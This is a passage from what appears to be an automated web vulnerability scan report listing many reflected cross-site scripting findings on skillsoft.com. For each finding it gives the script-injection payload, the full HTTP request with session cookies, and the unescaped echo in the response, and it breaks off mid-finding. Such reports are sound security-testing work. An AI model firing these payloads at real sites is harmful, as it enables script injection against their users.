HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 167338
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/press_room/press_releases/December_10_10_Financials.asp?31eb6"><script>alert(1)</script>11217fc0150=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.41. http://skillsoft.com/about/press_room/press_releases/December_13_10_ThomasNelson.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/press_room/press_releases/December_13_10_ThomasNelson.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c113"><script>alert(1)</script>c731fb21e72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/press_room/press_releases/December_13_10_ThomasNelson.asp?4c113"><script>alert(1)</script>c731fb21e72=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50456
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/press_room/press_releases/December_13_10_ThomasNelson.asp?4c113"><script>alert(1)</script>c731fb21e72=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.42. http://skillsoft.com/about/press_room/press_releases/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/press_room/press_releases/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d978"><script>alert(1)</script>38d223843dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/press_room/press_releases/default.asp?7d978"><script>alert(1)</script>38d223843dc=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 135638
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/press_room/press_releases/default.asp?7d978"><script>alert(1)</script>38d223843dc=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.43. http://skillsoft.com/about/worldwide.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /about/worldwide.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9583c"><script>alert(1)</script>eb7bb63440c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/worldwide.asp?9583c"><script>alert(1)</script>eb7bb63440c=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40473
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/about/worldwide.asp?9583c"><script>alert(1)</script>eb7bb63440c=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.44. http://skillsoft.com/error.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /error.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f40c1"><script>alert(1)</script>203cbbf39fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /error.asp?f40c1"><script>alert(1)</script>203cbbf39fc=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33310
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:50:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/error.asp?f40c1"><script>alert(1)</script>203cbbf39fc=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.45. http://skillsoft.com/privacy.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /privacy.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 264cc"><script>alert(1)</script>326d02d253b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /privacy.asp?264cc"><script>alert(1)</script>326d02d253b=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48353
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:50:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/privacy.asp?264cc"><script>alert(1)</script>326d02d253b=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.46. http://skillsoft.com/products/BES.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/BES.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46096"><script>alert(1)</script>56cd8af9534 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/BES.asp?46096"><script>alert(1)</script>56cd8af9534=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47315
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/BES.asp?46096"><script>alert(1)</script>56cd8af9534=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.47. http://skillsoft.com/products/KnowledgeCenters/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/KnowledgeCenters/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27401"><script>alert(1)</script>77c271812f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/KnowledgeCenters/default.asp?27401"><script>alert(1)</script>77c271812f5=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 57507
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:48:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/KnowledgeCenters/default.asp?27401"><script>alert(1)</script>77c271812f5=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.48. http://skillsoft.com/products/LDC/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/LDC/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f48e7"><script>alert(1)</script>051c3490341 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/LDC/default.asp?f48e7"><script>alert(1)</script>051c3490341=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 48437
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:47:34 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/LDC/default.asp?f48e7"><script>alert(1)</script>051c3490341=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.49. http://skillsoft.com/products/SLA/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/SLA/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ada9"><script>alert(1)</script>883a4b16204 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/SLA/default.asp?5ada9"><script>alert(1)</script>883a4b16204=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50008
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:48:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/SLA/default.asp?5ada9"><script>alert(1)</script>883a4b16204=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.50. http://skillsoft.com/products/SkillChoice_Solutions.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/SkillChoice_Solutions.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5d98"><script>alert(1)</script>c64a9160c15 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/SkillChoice_Solutions.asp?a5d98"><script>alert(1)</script>c64a9160c15=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50523
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:48:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/SkillChoice_Solutions.asp?a5d98"><script>alert(1)</script>c64a9160c15=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.51. http://skillsoft.com/products/SkillPort/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/SkillPort/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62511"><script>alert(1)</script>7687536f2c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/SkillPort/default.asp?62511"><script>alert(1)</script>7687536f2c7=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 53382
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:48:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/SkillPort/default.asp?62511"><script>alert(1)</script>7687536f2c7=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.52. http://skillsoft.com/products/SkillSoft_Select.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/SkillSoft_Select.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3202f"><script>alert(1)</script>e925bc0504c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/SkillSoft_Select.asp?3202f"><script>alert(1)</script>e925bc0504c=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 50661
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:49:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/SkillSoft_Select.asp?3202f"><script>alert(1)</script>e925bc0504c=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.53. http://skillsoft.com/products/course_collections/IT_professional.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/IT_professional.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff73b"><script>alert(1)</script>34f6fbc56f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/course_collections/IT_professional.asp?ff73b"><script>alert(1)</script>34f6fbc56f5=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 51026
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:45:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/course_collections/IT_professional.asp?ff73b"><script>alert(1)</script>34f6fbc56f5=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.54. http://skillsoft.com/products/course_collections/Sun.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/Sun.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5588"><script>alert(1)</script>ae8110e2793 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/course_collections/Sun.asp?d5588"><script>alert(1)</script>ae8110e2793=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 47369
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:47:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/course_collections/Sun.asp?d5588"><script>alert(1)</script>ae8110e2793=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.55. http://skillsoft.com/products/course_collections/business_skills.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/business_skills.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47fea"><script>alert(1)</script>85aa98088ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/course_collections/business_skills.asp?47fea"><script>alert(1)</script>85aa98088ed=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 54502
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 03 Jan 2011 12:44:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

...[SNIP]...
<a href="/products/course_collections/business_skills.asp?47fea"><script>alert(1)</script>85aa98088ed=1&amp;print=1" title="Printer Friendly Link" target="_blank" class="file print">
...[SNIP]...

1.56. http://skillsoft.com/products/course_collections/compliance.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://skillsoft.com
Path:   /products/course_collections/compliance.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 727c3"><script>alert(1)</script>11f582872a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /products/course_collections/compliance.asp?727c3"><script>alert(1)</script>11f582872a9=1 HTTP/1.1
Host: skillsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ll_referrer=; ll_engine=NA; __utmz=142141232.1294058476.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerSKILLSOFT_COM=748762634.20480.0000; ll_keyword=NA; __utma=142141232.2129243922.1294058476.1294058476.1294058476.1; ll_type=%3Ans; __utmc=142141232; ASPSESSIONIDQSRBRDSC=BCNLIMNAFEKCKKGKEOKBCKFE; __utmb=142141232.2.10.1294058476;

Response

